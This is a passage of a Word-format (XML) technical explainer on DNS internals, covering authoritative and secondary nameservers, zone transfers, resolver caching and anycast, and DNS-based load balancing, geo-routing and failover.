    <w:p w14:paraId="11D113F8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cost: massive load on authoritative nameservers, much higher query latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF7D74E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="4CDC43CA">
          <v:rect id="_x0000_i3173" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B8661" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Authoritative Nameservers — Internal Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F162C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>An authoritative nameserver is the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>source of truth</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for a zone. When it responds, the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AA (Authoritative Answer) bit</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> is set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D727539" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Primary and Secondary Nameservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07BA02" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Primary (Master):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The zone file is maintained here. DNS administrators make changes here. Writes go here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277E8AB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Secondary (Slave):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Receive zone data from the primary via </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zone transfer</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Serve as read replicas for redundancy and load distribution. Never write zone data locally — always replicate from primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D25D164" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone Transfer mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDEF179" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AXFR (Full Zone Transfer):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The secondary requests the entire zone file. Expensive — transfers all records even if one changed. Used when a secondary is initialized or significantly out of sync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E28A72" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IXFR (Incremental Zone Transfer):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The secondary sends its current serial number. The primary responds with only the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>changes since that serial</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (add/delete records). Much more efficient. Internally, primaries must maintain a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>change journal</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> of all modifications and their associated serial numbers to support IXFR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E608F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone transfer trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1AAA5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="600"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Secondary polls primary periodically (refresh interval from SOA record).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C2C0D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="600"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Primary can </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTIFY</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> secondaries (RFC 1996) — sends an unsolicited message to secondaries when the zone changes. Secondaries receive the NOTIFY and immediately initiate a zone transfer check. This reduces propagation delay from the full refresh interval to seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A2935D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hidden Primary Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFC29CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Production DNS often uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hidden primary</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — the primary nameserver is not publicly listed in NS records. Only secondary nameservers are publicly exposed. The hidden primary sits behind a firewall, receives zone updates (from your DNS management software or API), and notifies secondaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DCA791" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07153674" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The primary (where zone file changes are made) is protected from DDoS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6AC46" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Public nameservers are CDN-distributed secondaries optimized for high-volume query handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BD2BE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attack surface is dramatically reduced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0B0A6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="39218129">
          <v:rect id="_x0000_i3174" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B579E3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. DNS Caching Architecture at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11F265" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursive Resolver Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D1357" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>A high-traffic recursive resolver like Google's 8.8.8.8 handles </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>billions of queries per day</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2BB3D0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Massive in-memory cache (hundreds of GB) storing RRsets (sets of records of the same type for the same name). The cache is keyed by (name, type, class). TTLs are decremented in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E3024" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Negative cache:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Stores NXDOMAIN and NOERROR/NODATA responses separately. If xyz.example.com doesn't exist, that negative response is cached (for the SOA minimum TTL) so subsequent queries for the same name don't trigger a resolution chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9BF67" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefetching:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> When a cached record's TTL is close to expiration and queries are still coming in for it, the resolver </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proactively refetches</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> the record in the background before it expires. This eliminates cache miss latency for popular domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920A297" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast deployment:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> 8.8.8.8 is not one machine. It's hundreds of machines in data centers worldwide, all advertising the same IP via BGP Anycast. Your query goes to the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nearest Google DNS node</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — typically &lt;5ms away. Each node has its own cache. Cache coherence across nodes is NOT maintained — different nodes may have different cached values for the same record. This is acceptable because DNS is eventually consistent by design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A6254" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The "Last Mile" Resolver Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B2ADF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Many ISP-provided DNS resolvers are </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>slow and poorly maintained</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — old hardware, small caches, geographic concentration. This is why switching to 8.8.8.8 or 1.1.1.1 often improves perceived internet speed — not because name resolution is faster per se, but because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23589EAE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Better hardware → more queries served from cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC41BF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Better peering → lower latency to root/TLD servers on cache misses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C02E945" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Larger caches → more cache hits for less popular domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BBCE57" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="5564E77F">
          <v:rect id="_x0000_i3175" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE7A405" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. DNS and Load Balancing / Geo-Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C0114" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS is a powerful tool for traffic distribution beyond simple IP lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381204A7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS Round Robin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264950D6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>An authoritative server returns </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple A records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for the same name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AEF73C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044F9C4E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>api.example.com.  60  IN  A  10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C1833" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>api.example.com.  60  IN  A  10.0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA961C1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>api.example.com.  60  IN  A  10.0.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4017DB17" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The recursive resolver returns all three to the client, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rotating their order</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> in each response. The client's TCP stack typically uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first IP in the list</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. This provides crude load distribution but has critical limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CE11D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No health checking:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> If 10.0.0.2 is down, DNS still returns it. Clients trying it will fail until the TTL expires and the record is removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094F49F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uneven distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Clients cache the IP for the TTL duration. A client that resolves during high traffic gets one IP and hammers it for 60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D793E91" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No geographic awareness:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> All clients globally get the same IPs regardless of their location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F623378" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GeoDNS / Anycast-based Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455D408F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GeoDNS:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The authoritative nameserver returns </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>different A records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> based on the client's geographic location (inferred from the recursive resolver's IP, or from EDNS Client Subnet extension). A user in Europe gets a European IP; a user in Asia gets an Asian IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582901B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Example flow with Cloudflare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF33B4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client queries for api.example.com from Frankfurt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF3657" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Query reaches Frankfurt recursive resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64790D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Frankfurt resolver queries Cloudflare's authoritative server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284D291" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cloudflare sees the resolver IP is in Germany → returns Frankfurt CDN IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F05A0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Frankfurt resolver caches this. European clients using this resolver get the Frankfurt IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7BC31" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>US resolver queries separately → gets US CDN IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B8164" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Geo-accuracy depends on resolver IP, not client IP. A user in Germany using Google's 8.8.8.8 (whose nearest node might be in different regions) may get a non-optimal IP. EDNS Client Subnet mitigates this by including the client's /24 subnet in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F87C8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-based Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488F52D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Route 53, Cloudflare, and similar DNS providers offer </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>health-checked DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35328854" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Provider continuously sends health check probes (HTTP GET, TCP connect) to your IPs.</w:t>
      </w:r>
    </w:p>
